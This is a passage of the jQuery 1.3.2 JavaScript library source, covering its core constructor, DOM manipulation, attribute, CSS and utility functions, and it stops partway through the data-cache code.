/*!
 * jQuery JavaScript Library v1.3.2
 * http://jquery.com/
 *
 * Copyright (c) 2009 John Resig
 * Dual licensed under the MIT and GPL licenses.
 * http://docs.jquery.com/License
 *
 * Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009)
 * Revision: 6246
 */
(function(){

var 
	// Will speed up references to window, and allows munging its name.
	window = this,
	// Will speed up references to undefined, and allows munging its name.
	undefined,
	// Map over jQuery in case of overwrite
	_jQuery = window.jQuery,
	// Map over the $ in case of overwrite
	_$ = window.$,

	jQuery = window.jQuery = window.$ = function( selector, context ) {
		// The jQuery object is actually just the init constructor 'enhanced'
		return new jQuery.fn.init( selector, context );
	},

	// A simple way to check for HTML strings or ID strings
	// (both of which we optimize for)
	quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,
	// Is it a simple selector
	isSimple = /^.[^:#\[\.,]*$/;

jQuery.fn = jQuery.prototype = {
	init: function( selector, context ) {
		// Make sure that a selection was provided
		selector = selector || document;

		// Handle $(DOMElement)
		if ( selector.nodeType ) {
			this[0] = selector;
			this.length = 1;
			this.context = selector;
			return this;
		}
		// Handle HTML strings
		if ( typeof selector === "string" ) {
			// Are we dealing with HTML string or an ID?
			var match = quickExpr.exec( selector );

			// Verify a match, and that no context was specified for #id
			if ( match && (match[1] || !context) ) {

				// HANDLE: $(html) -> $(array)
				if ( match[1] )
					selector = jQuery.clean( [ match[1] ], context );

				// HANDLE: $("#id")
				else {
					var elem = document.getElementById( match[3] );

					// Handle the case where IE and Opera return items
					// by name instead of ID
					if ( elem && elem.id != match[3] )
						return jQuery().find( selector );

					// Otherwise, we inject the element directly into the jQuery object
					var ret = jQuery( elem || [] );
					ret.context = document;
					ret.selector = selector;
					return ret;
				}

			// HANDLE: $(expr, [context])
			// (which is just equivalent to: $(content).find(expr)
			} else
				return jQuery( context ).find( selector );

		// HANDLE: $(function)
		// Shortcut for document ready
		} else if ( jQuery.isFunction( selector ) )
			return jQuery( document ).ready( selector );

		// Make sure that old selector state is passed along
		if ( selector.selector && selector.context ) {
			this.selector = selector.selector;
			this.context = selector.context;
		}

		return this.setArray(jQuery.isArray( selector ) ?
			selector :
			jQuery.makeArray(selector));
	},

	// Start with an empty selector
	selector: "",

	// The current version of jQuery being used
	jquery: "1.3.2",

	// The number of elements contained in the matched element set
	size: function() {
		return this.length;
	},

	// Get the Nth element in the matched element set OR
	// Get the whole matched element set as a clean array
	get: function( num ) {
		return num === undefined ?

			// Return a 'clean' array
			Array.prototype.slice.call( this ) :

			// Return just the object
			this[ num ];
	},

	// Take an array of elements and push it onto the stack
	// (returning the new matched element set)
	pushStack: function( elems, name, selector ) {
		// Build a new jQuery matched element set
		var ret = jQuery( elems );

		// Add the old object onto the stack (as a reference)
		ret.prevObject = this;

		ret.context = this.context;

		if ( name === "find" )
			ret.selector = this.selector + (this.selector ? " " : "") + selector;
		else if ( name )
			ret.selector = this.selector + "." + name + "(" + selector + ")";

		// Return the newly-formed element set
		return ret;
	},

	// Force the current matched set of elements to become
	// the specified array of elements (destroying the stack in the process)
	// You should use pushStack() in order to do this, but maintain the stack
	setArray: function( elems ) {
		// Resetting the length to 0, then using the native Array push
		// is a super-fast way to populate an object with array-like properties
		this.length = 0;
		Array.prototype.push.apply( this, elems );

		return this;
	},

	// Execute a callback for every element in the matched set.
	// (You can seed the arguments with an array of args, but this is
	// only used internally.)
	each: function( callback, args ) {
		return jQuery.each( this, callback, args );
	},

	// Determine the position of an element within
	// the matched set of elements
	index: function( elem ) {
		// Locate the position of the desired element
		return jQuery.inArray(
			// If it receives a jQuery object, the first element is used
			elem && elem.jquery ? elem[0] : elem
		, this );
	},

	attr: function( name, value, type ) {
		var options = name;

		// Look for the case where we're accessing a style value
		if ( typeof name === "string" )
			if ( value === undefined )
				return this[0] && jQuery[ type || "attr" ]( this[0], name );

			else {
				options = {};
				options[ name ] = value;
			}

		// Check to see if we're setting style values
		return this.each(function(i){
			// Set all the styles
			for ( name in options )
				jQuery.attr(
					type ?
						this.style :
						this,
					name, jQuery.prop( this, options[ name ], type, i, name )
				);
		});
	},

	css: function( key, value ) {
		// ignore negative width and height values
		if ( (key == 'width' || key == 'height') && parseFloat(value) < 0 )
			value = undefined;
		return this.attr( key, value, "curCSS" );
	},

	text: function( text ) {
		if ( typeof text !== "object" && text != null )
			return this.empty().append( (this[0] && this[0].ownerDocument || document).createTextNode( text ) );

		var ret = "";

		jQuery.each( text || this, function(){
			jQuery.each( this.childNodes, function(){
				if ( this.nodeType != 8 )
					ret += this.nodeType != 1 ?
						this.nodeValue :
						jQuery.fn.text( [ this ] );
			});
		});

		return ret;
	},

	wrapAll: function( html ) {
		if ( this[0] ) {
			// The elements to wrap the target around
			var wrap = jQuery( html, this[0].ownerDocument ).clone();

			if ( this[0].parentNode )
				wrap.insertBefore( this[0] );

			wrap.map(function(){
				var elem = this;

				while ( elem.firstChild )
					elem = elem.firstChild;

				return elem;
			}).append(this);
		}

		return this;
	},

	wrapInner: function( html ) {
		return this.each(function(){
			jQuery( this ).contents().wrapAll( html );
		});
	},

	wrap: function( html ) {
		return this.each(function(){
			jQuery( this ).wrapAll( html );
		});
	},

	append: function() {
		return this.domManip(arguments, true, function(elem){
			if (this.nodeType == 1)
				this.appendChild( elem );
		});
	},

	prepend: function() {
		return this.domManip(arguments, true, function(elem){
			if (this.nodeType == 1)
				this.insertBefore( elem, this.firstChild );
		});
	},

	before: function() {
		return this.domManip(arguments, false, function(elem){
			this.parentNode.insertBefore( elem, this );
		});
	},

	after: function() {
		return this.domManip(arguments, false, function(elem){
			this.parentNode.insertBefore( elem, this.nextSibling );
		});
	},

	end: function() {
		return this.prevObject || jQuery( [] );
	},

	// For internal use only.
	// Behaves like an Array's method, not like a jQuery method.
	push: [].push,
	sort: [].sort,
	splice: [].splice,

	find: function( selector ) {
		if ( this.length === 1 ) {
			var ret = this.pushStack( [], "find", selector );
			ret.length = 0;
			jQuery.find( selector, this[0], ret );
			return ret;
		} else {
			return this.pushStack( jQuery.unique(jQuery.map(this, function(elem){
				return jQuery.find( selector, elem );
			})), "find", selector );
		}
	},

	clone: function( events ) {
		// Do the clone
		var ret = this.map(function(){
			if ( !jQuery.support.noCloneEvent && !jQuery.isXMLDoc(this) ) {
				// IE copies events bound via attachEvent when
				// using cloneNode. Calling detachEvent on the
				// clone will also remove the events from the orignal
				// In order to get around this, we use innerHTML.
				// Unfortunately, this means some modifications to
				// attributes in IE that are actually only stored
				// as properties will not be copied (such as the
				// the name attribute on an input).
				var html = this.outerHTML;
				if ( !html ) {
					var div = this.ownerDocument.createElement("div");
					div.appendChild( this.cloneNode(true) );
					html = div.innerHTML;
				}

				return jQuery.clean([html.replace(/ jQuery\d+="(?:\d+|null)"/g, "").replace(/^\s*/, "")])[0];
			} else
				return this.cloneNode(true);
		});

		// Copy the events from the original to the clone
		if ( events === true ) {
			var orig = this.find("*").andSelf(), i = 0;

			ret.find("*").andSelf().each(function(){
				if ( this.nodeName !== orig[i].nodeName )
					return;

				var events = jQuery.data( orig[i], "events" );

				for ( var type in events ) {
					for ( var handler in events[ type ] ) {
						jQuery.event.add( this, type, events[ type ][ handler ], events[ type ][ handler ].data );
					}
				}

				i++;
			});
		}

		// Return the cloned set
		return ret;
	},

	filter: function( selector ) {
		return this.pushStack(
			jQuery.isFunction( selector ) &&
			jQuery.grep(this, function(elem, i){
				return selector.call( elem, i );
			}) ||

			jQuery.multiFilter( selector, jQuery.grep(this, function(elem){
				return elem.nodeType === 1;
			}) ), "filter", selector );
	},

	closest: function( selector ) {
		var pos = jQuery.expr.match.POS.test( selector ) ? jQuery(selector) : null,
			closer = 0;

		return this.map(function(){
			var cur = this;
			while ( cur && cur.ownerDocument ) {
				if ( pos ? pos.index(cur) > -1 : jQuery(cur).is(selector) ) {
					jQuery.data(cur, "closest", closer);
					return cur;
				}
				cur = cur.parentNode;
				closer++;
			}
		});
	},

	not: function( selector ) {
		if ( typeof selector === "string" )
			// test special case where just one selector is passed in
			if ( isSimple.test( selector ) )
				return this.pushStack( jQuery.multiFilter( selector, this, true ), "not", selector );
			else
				selector = jQuery.multiFilter( selector, this );

		var isArrayLike = selector.length && selector[selector.length - 1] !== undefined && !selector.nodeType;
		return this.filter(function() {
			return isArrayLike ? jQuery.inArray( this, selector ) < 0 : this != selector;
		});
	},

	add: function( selector ) {
		return this.pushStack( jQuery.unique( jQuery.merge(
			this.get(),
			typeof selector === "string" ?
				jQuery( selector ) :
				jQuery.makeArray( selector )
		)));
	},

	is: function( selector ) {
		return !!selector && jQuery.multiFilter( selector, this ).length > 0;
	},

	hasClass: function( selector ) {
		return !!selector && this.is( "." + selector );
	},

	val: function( value ) {
		if ( value === undefined ) {			
			var elem = this[0];

			if ( elem ) {
				if( jQuery.nodeName( elem, 'option' ) )
					return (elem.attributes.value || {}).specified ? elem.value : elem.text;
				
				// We need to handle select boxes special
				if ( jQuery.nodeName( elem, "select" ) ) {
					var index = elem.selectedIndex,
						values = [],
						options = elem.options,
						one = elem.type == "select-one";

					// Nothing was selected
					if ( index < 0 )
						return null;

					// Loop through all the selected options
					for ( var i = one ? index : 0, max = one ? index + 1 : options.length; i < max; i++ ) {
						var option = options[ i ];

						if ( option.selected ) {
							// Get the specifc value for the option
							value = jQuery(option).val();

							// We don't need an array for one selects
							if ( one )
								return value;

							// Multi-Selects return an array
							values.push( value );
						}
					}

					return values;				
				}

				// Everything else, we just grab the value
				return (elem.value || "").replace(/\r/g, "");

			}

			return undefined;
		}

		if ( typeof value === "number" )
			value += '';

		return this.each(function(){
			if ( this.nodeType != 1 )
				return;

			if ( jQuery.isArray(value) && /radio|checkbox/.test( this.type ) )
				this.checked = (jQuery.inArray(this.value, value) >= 0 ||
					jQuery.inArray(this.name, value) >= 0);

			else if ( jQuery.nodeName( this, "select" ) ) {
				var values = jQuery.makeArray(value);

				jQuery( "option", this ).each(function(){
					this.selected = (jQuery.inArray( this.value, values ) >= 0 ||
						jQuery.inArray( this.text, values ) >= 0);
				});

				if ( !values.length )
					this.selectedIndex = -1;

			} else
				this.value = value;
		});
	},

	html: function( value ) {
		return value === undefined ?
			(this[0] ?
				this[0].innerHTML.replace(/ jQuery\d+="(?:\d+|null)"/g, "") :
				null) :
			this.empty().append( value );
	},

	replaceWith: function( value ) {
		return this.after( value ).remove();
	},

	eq: function( i ) {
		return this.slice( i, +i + 1 );
	},

	slice: function() {
		return this.pushStack( Array.prototype.slice.apply( this, arguments ),
			"slice", Array.prototype.slice.call(arguments).join(",") );
	},

	map: function( callback ) {
		return this.pushStack( jQuery.map(this, function(elem, i){
			return callback.call( elem, i, elem );
		}));
	},

	andSelf: function() {
		return this.add( this.prevObject );
	},

	domManip: function( args, table, callback ) {
		if ( this[0] ) {
			var fragment = (this[0].ownerDocument || this[0]).createDocumentFragment(),
				scripts = jQuery.clean( args, (this[0].ownerDocument || this[0]), fragment ),
				first = fragment.firstChild;

			if ( first )
				for ( var i = 0, l = this.length; i < l; i++ )
					callback.call( root(this[i], first), this.length > 1 || i > 0 ?
							fragment.cloneNode(true) : fragment );
		
			if ( scripts )
				jQuery.each( scripts, evalScript );
		}

		return this;
		
		function root( elem, cur ) {
			return table && jQuery.nodeName(elem, "table") && jQuery.nodeName(cur, "tr") ?
				(elem.getElementsByTagName("tbody")[0] ||
				elem.appendChild(elem.ownerDocument.createElement("tbody"))) :
				elem;
		}
	}
};

// Give the init function the jQuery prototype for later instantiation
jQuery.fn.init.prototype = jQuery.fn;

function evalScript( i, elem ) {
	if ( elem.src )
		jQuery.ajax({
			url: elem.src,
			async: false,
			dataType: "script"
		});

	else
		jQuery.globalEval( elem.text || elem.textContent || elem.innerHTML || "" );

	if ( elem.parentNode )
		elem.parentNode.removeChild( elem );
}

function now(){
	return +new Date;
}

jQuery.extend = jQuery.fn.extend = function() {
	// copy reference to target object
	var target = arguments[0] || {}, i = 1, length = arguments.length, deep = false, options;

	// Handle a deep copy situation
	if ( typeof target === "boolean" ) {
		deep = target;
		target = arguments[1] || {};
		// skip the boolean and the target
		i = 2;
	}

	// Handle case when target is a string or something (possible in deep copy)
	if ( typeof target !== "object" && !jQuery.isFunction(target) )
		target = {};

	// extend jQuery itself if only one argument is passed
	if ( length == i ) {
		target = this;
		--i;
	}

	for ( ; i < length; i++ )
		// Only deal with non-null/undefined values
		if ( (options = arguments[ i ]) != null )
			// Extend the base object
			for ( var name in options ) {
				var src = target[ name ], copy = options[ name ];

				// Prevent never-ending loop
				if ( target === copy )
					continue;

				// Recurse if we're merging object values
				if ( deep && copy && typeof copy === "object" && !copy.nodeType )
					target[ name ] = jQuery.extend( deep, 
						// Never move original objects, clone them
						src || ( copy.length != null ? [ ] : { } )
					, copy );

				// Don't bring in undefined values
				else if ( copy !== undefined )
					target[ name ] = copy;

			}

	// Return the modified object
	return target;
};

// exclude the following css properties to add px
var	exclude = /z-?index|font-?weight|opacity|zoom|line-?height/i,
	// cache defaultView
	defaultView = document.defaultView || {},
	toString = Object.prototype.toString;

jQuery.extend({
	noConflict: function( deep ) {
		window.$ = _$;

		if ( deep )
			window.jQuery = _jQuery;

		return jQuery;
	},

	// See test/unit/core.js for details concerning isFunction.
	// Since version 1.3, DOM methods and functions like alert
	// aren't supported. They return false on IE (#2968).
	isFunction: function( obj ) {
		return toString.call(obj) === "[object Function]";
	},

	isArray: function( obj ) {
		return toString.call(obj) === "[object Array]";
	},

	// check if an element is in a (or is an) XML document
	isXMLDoc: function( elem ) {
		return elem.nodeType === 9 && elem.documentElement.nodeName !== "HTML" ||
			!!elem.ownerDocument && jQuery.isXMLDoc( elem.ownerDocument );
	},

	// Evalulates a script in a global context
	globalEval: function( data ) {
		if ( data && /\S/.test(data) ) {
			// Inspired by code by Andrea Giammarchi
			// http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html
			var head = document.getElementsByTagName("head")[0] || document.documentElement,
				script = document.createElement("script");

			script.type = "text/javascript";
			if ( jQuery.support.scriptEval )
				script.appendChild( document.createTextNode( data ) );
			else
				script.text = data;

			// Use insertBefore instead of appendChild  to circumvent an IE6 bug.
			// This arises when a base node is used (#2709).
			head.insertBefore( script, head.firstChild );
			head.removeChild( script );
		}
	},

	nodeName: function( elem, name ) {
		return elem.nodeName && elem.nodeName.toUpperCase() == name.toUpperCase();
	},

	// args is for internal usage only
	each: function( object, callback, args ) {
		var name, i = 0, length = object.length;

		if ( args ) {
			if ( length === undefined ) {
				for ( name in object )
					if ( callback.apply( object[ name ], args ) === false )
						break;
			} else
				for ( ; i < length; )
					if ( callback.apply( object[ i++ ], args ) === false )
						break;

		// A special, fast, case for the most common use of each
		} else {
			if ( length === undefined ) {
				for ( name in object )
					if ( callback.call( object[ name ], name, object[ name ] ) === false )
						break;
			} else
				for ( var value = object[0];
					i < length && callback.call( value, i, value ) !== false; value = object[++i] ){}
		}

		return object;
	},

	prop: function( elem, value, type, i, name ) {
		// Handle executable functions
		if ( jQuery.isFunction( value ) )
			value = value.call( elem, i );

		// Handle passing in a number to a CSS property
		return typeof value === "number" && type == "curCSS" && !exclude.test( name ) ?
			value + "px" :
			value;
	},

	className: {
		// internal only, use addClass("class")
		add: function( elem, classNames ) {
			jQuery.each((classNames || "").split(/\s+/), function(i, className){
				if ( elem.nodeType == 1 && !jQuery.className.has( elem.className, className ) )
					elem.className += (elem.className ? " " : "") + className;
			});
		},

		// internal only, use removeClass("class")
		remove: function( elem, classNames ) {
			if (elem.nodeType == 1)
				elem.className = classNames !== undefined ?
					jQuery.grep(elem.className.split(/\s+/), function(className){
						return !jQuery.className.has( classNames, className );
					}).join(" ") :
					"";
		},

		// internal only, use hasClass("class")
		has: function( elem, className ) {
			return elem && jQuery.inArray( className, (elem.className || elem).toString().split(/\s+/) ) > -1;
		}
	},

	// A method for quickly swapping in/out CSS properties to get correct calculations
	swap: function( elem, options, callback ) {
		var old = {};
		// Remember the old values, and insert the new ones
		for ( var name in options ) {
			old[ name ] = elem.style[ name ];
			elem.style[ name ] = options[ name ];
		}

		callback.call( elem );

		// Revert the old values
		for ( var name in options )
			elem.style[ name ] = old[ name ];
	},

	css: function( elem, name, force, extra ) {
		if ( name == "width" || name == "height" ) {
			var val, props = { position: "absolute", visibility: "hidden", display:"block" }, which = name == "width" ? [ "Left", "Right" ] : [ "Top", "Bottom" ];

			function getWH() {
				val = name == "width" ? elem.offsetWidth : elem.offsetHeight;

				if ( extra === "border" )
					return;

				jQuery.each( which, function() {
					if ( !extra )
						val -= parseFloat(jQuery.curCSS( elem, "padding" + this, true)) || 0;
					if ( extra === "margin" )
						val += parseFloat(jQuery.curCSS( elem, "margin" + this, true)) || 0;
					else
						val -= parseFloat(jQuery.curCSS( elem, "border" + this + "Width", true)) || 0;
				});
			}

			if ( elem.offsetWidth !== 0 )
				getWH();
			else
				jQuery.swap( elem, props, getWH );

			return Math.max(0, Math.round(val));
		}

		return jQuery.curCSS( elem, name, force );
	},

	curCSS: function( elem, name, force ) {
		var ret, style = elem.style;

		// We need to handle opacity special in IE
		if ( name == "opacity" && !jQuery.support.opacity ) {
			ret = jQuery.attr( style, "opacity" );

			return ret == "" ?
				"1" :
				ret;
		}

		// Make sure we're using the right name for getting the float value
		if ( name.match( /float/i ) )
			name = styleFloat;

		if ( !force && style && style[ name ] )
			ret = style[ name ];

		else if ( defaultView.getComputedStyle ) {

			// Only "float" is needed here
			if ( name.match( /float/i ) )
				name = "float";

			name = name.replace( /([A-Z])/g, "-$1" ).toLowerCase();

			var computedStyle = defaultView.getComputedStyle( elem, null );

			if ( computedStyle )
				ret = computedStyle.getPropertyValue( name );

			// We should always get a number back from opacity
			if ( name == "opacity" && ret == "" )
				ret = "1";

		} else if ( elem.currentStyle ) {
			var camelCase = name.replace(/\-(\w)/g, function(all, letter){
				return letter.toUpperCase();
			});

			ret = elem.currentStyle[ name ] || elem.currentStyle[ camelCase ];

			// From the awesome hack by Dean Edwards
			// http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291

			// If we're not dealing with a regular pixel number
			// but a number that has a weird ending, we need to convert it to pixels
			if ( !/^\d+(px)?$/i.test( ret ) && /^\d/.test( ret ) ) {
				// Remember the original values
				var left = style.left, rsLeft = elem.runtimeStyle.left;

				// Put in the new values to get a computed value out
				elem.runtimeStyle.left = elem.currentStyle.left;
				style.left = ret || 0;
				ret = style.pixelLeft + "px";

				// Revert the changed values
				style.left = left;
				elem.runtimeStyle.left = rsLeft;
			}
		}

		return ret;
	},

	clean: function( elems, context, fragment ) {
		context = context || document;

		// !context.createElement fails in IE with an error but returns typeof 'object'
		if ( typeof context.createElement === "undefined" )
			context = context.ownerDocument || context[0] && context[0].ownerDocument || document;

		// If a single string is passed in and it's a single tag
		// just do a createElement and skip the rest
		if ( !fragment && elems.length === 1 && typeof elems[0] === "string" ) {
			var match = /^<(\w+)\s*\/?>$/.exec(elems[0]);
			if ( match )
				return [ context.createElement( match[1] ) ];
		}

		var ret = [], scripts = [], div = context.createElement("div");

		jQuery.each(elems, function(i, elem){
			if ( typeof elem === "number" )
				elem += '';

			if ( !elem )
				return;

			// Convert html string into DOM nodes
			if ( typeof elem === "string" ) {
				// Fix "XHTML"-style tags in all browsers
				elem = elem.replace(/(<(\w+)[^>]*?)\/>/g, function(all, front, tag){
					return tag.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i) ?
						all :
						front + "></" + tag + ">";
				});

				// Trim whitespace, otherwise indexOf won't work as expected
				var tags = elem.replace(/^\s+/, "").substring(0, 10).toLowerCase();

				var wrap =
					// option or optgroup
					!tags.indexOf("<opt") &&
					[ 1, "<select multiple='multiple'>", "</select>" ] ||

					!tags.indexOf("<leg") &&
					[ 1, "<fieldset>", "</fieldset>" ] ||

					tags.match(/^<(thead|tbody|tfoot|colg|cap)/) &&
					[ 1, "<table>", "</table>" ] ||

					!tags.indexOf("<tr") &&
					[ 2, "<table><tbody>", "</tbody></table>" ] ||

				 	// <thead> matched above
					(!tags.indexOf("<td") || !tags.indexOf("<th")) &&
					[ 3, "<table><tbody><tr>", "</tr></tbody></table>" ] ||

					!tags.indexOf("<col") &&
					[ 2, "<table><tbody></tbody><colgroup>", "</colgroup></table>" ] ||

					// IE can't serialize <link> and <script> tags normally
					!jQuery.support.htmlSerialize &&
					[ 1, "div<div>", "</div>" ] ||

					[ 0, "", "" ];

				// Go to html and back, then peel off extra wrappers
				div.innerHTML = wrap[1] + elem + wrap[2];

				// Move to the right depth
				while ( wrap[0]-- )
					div = div.lastChild;

				// Remove IE's autoinserted <tbody> from table fragments
				if ( !jQuery.support.tbody ) {

					// String was a <table>, *may* have spurious <tbody>
					var hasBody = /<tbody/i.test(elem),
						tbody = !tags.indexOf("<table") && !hasBody ?
							div.firstChild && div.firstChild.childNodes :

						// String was a bare <thead> or <tfoot>
						wrap[1] == "<table>" && !hasBody ?
							div.childNodes :
							[];

					for ( var j = tbody.length - 1; j >= 0 ; --j )
						if ( jQuery.nodeName( tbody[ j ], "tbody" ) && !tbody[ j ].childNodes.length )
							tbody[ j ].parentNode.removeChild( tbody[ j ] );

					}

				// IE completely kills leading whitespace when innerHTML is used
				if ( !jQuery.support.leadingWhitespace && /^\s/.test( elem ) )
					div.insertBefore( context.createTextNode( elem.match(/^\s*/)[0] ), div.firstChild );
				
				elem = jQuery.makeArray( div.childNodes );
			}

			if ( elem.nodeType )
				ret.push( elem );
			else
				ret = jQuery.merge( ret, elem );

		});

		if ( fragment ) {
			for ( var i = 0; ret[i]; i++ ) {
				if ( jQuery.nodeName( ret[i], "script" ) && (!ret[i].type || ret[i].type.toLowerCase() === "text/javascript") ) {
					scripts.push( ret[i].parentNode ? ret[i].parentNode.removeChild( ret[i] ) : ret[i] );
				} else {
					if ( ret[i].nodeType === 1 )
						ret.splice.apply( ret, [i + 1, 0].concat(jQuery.makeArray(ret[i].getElementsByTagName("script"))) );
					fragment.appendChild( ret[i] );
				}
			}
			
			return scripts;
		}

		return ret;
	},

	attr: function( elem, name, value ) {
		// don't set attributes on text and comment nodes
		if (!elem || elem.nodeType == 3 || elem.nodeType == 8)
			return undefined;

		var notxml = !jQuery.isXMLDoc( elem ),
			// Whether we are setting (or getting)
			set = value !== undefined;

		// Try to normalize/fix the name
		name = notxml && jQuery.props[ name ] || name;

		// Only do all the following if this is a node (faster for style)
		// IE elem.getAttribute passes even for style
		if ( elem.tagName ) {

			// These attributes require special treatment
			var special = /href|src|style/.test( name );

			// Safari mis-reports the default selected property of a hidden option
			// Accessing the parent's selectedIndex property fixes it
			if ( name == "selected" && elem.parentNode )
				elem.parentNode.selectedIndex;

			// If applicable, access the attribute via the DOM 0 way
			if ( name in elem && notxml && !special ) {
				if ( set ){
					// We can't allow the type property to be changed (since it causes problems in IE)
					if ( name == "type" && jQuery.nodeName( elem, "input" ) && elem.parentNode )
						throw "type property can't be changed";

					elem[ name ] = value;
				}

				// browsers index elements by id/name on forms, give priority to attributes.
				if( jQuery.nodeName( elem, "form" ) && elem.getAttributeNode(name) )
					return elem.getAttributeNode( name ).nodeValue;

				// elem.tabIndex doesn't always return the correct value when it hasn't been explicitly set
				// http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/
				if ( name == "tabIndex" ) {
					var attributeNode = elem.getAttributeNode( "tabIndex" );
					return attributeNode && attributeNode.specified
						? attributeNode.value
						: elem.nodeName.match(/(button|input|object|select|textarea)/i)
							? 0
							: elem.nodeName.match(/^(a|area)$/i) && elem.href
								? 0
								: undefined;
				}

				return elem[ name ];
			}

			if ( !jQuery.support.style && notxml &&  name == "style" )
				return jQuery.attr( elem.style, "cssText", value );

			if ( set )
				// convert the value to a string (all browsers do this but IE) see #1070
				elem.setAttribute( name, "" + value );

			var attr = !jQuery.support.hrefNormalized && notxml && special
					// Some attributes require a special call on IE
					? elem.getAttribute( name, 2 )
					: elem.getAttribute( name );

			// Non-existent attributes return null, we normalize to undefined
			return attr === null ? undefined : attr;
		}

		// elem is actually elem.style ... set the style

		// IE uses filters for opacity
		if ( !jQuery.support.opacity && name == "opacity" ) {
			if ( set ) {
				// IE has trouble with opacity if it does not have layout
				// Force it by setting the zoom level
				elem.zoom = 1;

				// Set the alpha filter to set the opacity
				elem.filter = (elem.filter || "").replace( /alpha\([^)]*\)/, "" ) +
					(parseInt( value ) + '' == "NaN" ? "" : "alpha(opacity=" + value * 100 + ")");
			}

			return elem.filter && elem.filter.indexOf("opacity=") >= 0 ?
				(parseFloat( elem.filter.match(/opacity=([^)]*)/)[1] ) / 100) + '':
				"";
		}

		name = name.replace(/-([a-z])/ig, function(all, letter){
			return letter.toUpperCase();
		});

		if ( set )
			elem[ name ] = value;

		return elem[ name ];
	},

	trim: function( text ) {
		return (text || "").replace( /^\s+|\s+$/g, "" );
	},

	makeArray: function( array ) {
		var ret = [];

		if( array != null ){
			var i = array.length;
			// The window, strings (and functions) also have 'length'
			if( i == null || typeof array === "string" || jQuery.isFunction(array) || array.setInterval )
				ret[0] = array;
			else
				while( i )
					ret[--i] = array[i];
		}

		return ret;
	},

	inArray: function( elem, array ) {
		for ( var i = 0, length = array.length; i < length; i++ )
		// Use === because on IE, window == document
			if ( array[ i ] === elem )
				return i;

		return -1;
	},

	merge: function( first, second ) {
		// We have to loop this way because IE & Opera overwrite the length
		// expando of getElementsByTagName
		var i = 0, elem, pos = first.length;
		// Also, we need to make sure that the correct elements are being returned
		// (IE returns comment nodes in a '*' query)
		if ( !jQuery.support.getAll ) {
			while ( (elem = second[ i++ ]) != null )
				if ( elem.nodeType != 8 )
					first[ pos++ ] = elem;

		} else
			while ( (elem = second[ i++ ]) != null )
				first[ pos++ ] = elem;

		return first;
	},

	unique: function( array ) {
		var ret = [], done = {};

		try {

			for ( var i = 0, length = array.length; i < length; i++ ) {
				var id = jQuery.data( array[ i ] );

				if ( !done[ id ] ) {
					done[ id ] = true;
					ret.push( array[ i ] );
				}
			}

		} catch( e ) {
			ret = array;
		}

		return ret;
	},

	grep: function( elems, callback, inv ) {
		var ret = [];

		// Go through the array, only saving the items
		// that pass the validator function
		for ( var i = 0, length = elems.length; i < length; i++ )
			if ( !inv != !callback( elems[ i ], i ) )
				ret.push( elems[ i ] );

		return ret;
	},

	map: function( elems, callback ) {
		var ret = [];

		// Go through the array, translating each of the items to their
		// new value (or values).
		for ( var i = 0, length = elems.length; i < length; i++ ) {
			var value = callback( elems[ i ], i );

			if ( value != null )
				ret[ ret.length ] = value;
		}

		return ret.concat.apply( [], ret );
	}
});

// Use of jQuery.browser is deprecated.
// It's included for backwards compatibility and plugins,
// although they should work to migrate away.

var userAgent = navigator.userAgent.toLowerCase();

// Figure out what browser is being used
jQuery.browser = {
	version: (userAgent.match( /.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/ ) || [0,'0'])[1],
	safari: /webkit/.test( userAgent ),
	opera: /opera/.test( userAgent ),
	msie: /msie/.test( userAgent ) && !/opera/.test( userAgent ),
	mozilla: /mozilla/.test( userAgent ) && !/(compatible|webkit)/.test( userAgent )
};

jQuery.each({
	parent: function(elem){return elem.parentNode;},
	parents: function(elem){return jQuery.dir(elem,"parentNode");},
	next: function(elem){return jQuery.nth(elem,2,"nextSibling");},
	prev: function(elem){return jQuery.nth(elem,2,"previousSibling");},
	nextAll: function(elem){return jQuery.dir(elem,"nextSibling");},
	prevAll: function(elem){return jQuery.dir(elem,"previousSibling");},
	siblings: function(elem){return jQuery.sibling(elem.parentNode.firstChild,elem);},
	children: function(elem){return jQuery.sibling(elem.firstChild);},
	contents: function(elem){return jQuery.nodeName(elem,"iframe")?elem.contentDocument||elem.contentWindow.document:jQuery.makeArray(elem.childNodes);}
}, function(name, fn){
	jQuery.fn[ name ] = function( selector ) {
		var ret = jQuery.map( this, fn );

		if ( selector && typeof selector == "string" )
			ret = jQuery.multiFilter( selector, ret );

		return this.pushStack( jQuery.unique( ret ), name, selector );
	};
});

jQuery.each({
	appendTo: "append",
	prependTo: "prepend",
	insertBefore: "before",
	insertAfter: "after",
	replaceAll: "replaceWith"
}, function(name, original){
	jQuery.fn[ name ] = function( selector ) {
		var ret = [], insert = jQuery( selector );

		for ( var i = 0, l = insert.length; i < l; i++ ) {
			var elems = (i > 0 ? this.clone(true) : this).get();
			jQuery.fn[ original ].apply( jQuery(insert[i]), elems );
			ret = ret.concat( elems );
		}

		return this.pushStack( ret, name, selector );
	};
});

jQuery.each({
	removeAttr: function( name ) {
		jQuery.attr( this, name, "" );
		if (this.nodeType == 1)
			this.removeAttribute( name );
	},

	addClass: function( classNames ) {
		jQuery.className.add( this, classNames );
	},

	removeClass: function( classNames ) {
		jQuery.className.remove( this, classNames );
	},

	toggleClass: function( classNames, state ) {
		if( typeof state !== "boolean" )
			state = !jQuery.className.has( this, classNames );
		jQuery.className[ state ? "add" : "remove" ]( this, classNames );
	},

	remove: function( selector ) {
		if ( !selector || jQuery.filter( selector, [ this ] ).length ) {
			// Prevent memory leaks
			jQuery( "*", this ).add([this]).each(function(){
				jQuery.event.remove(this);
				jQuery.removeData(this);
			});
			if (this.parentNode)
				this.parentNode.removeChild( this );
		}
	},

	empty: function() {
		// Remove element nodes and prevent memory leaks
		jQuery(this).children().remove();

		// Remove any remaining nodes
		while ( this.firstChild )
			this.removeChild( this.firstChild );
	}
}, function(name, fn){
	jQuery.fn[ name ] = function(){
		return this.each( fn, arguments );
	};
});

// Helper function used by the dimensions and offset modules
function num(elem, prop) {
	return elem[0] && parseInt( jQuery.curCSS(elem[0], prop, true), 10 ) || 0;
}
var expando = "jQuery" + now(), uuid = 0, windowData = {};

jQuery.extend({
	cache: {},

	data: function( elem, name, data ) {
		elem = elem == window ?
			windowData :
			elem;

		var id = elem[ expando ];

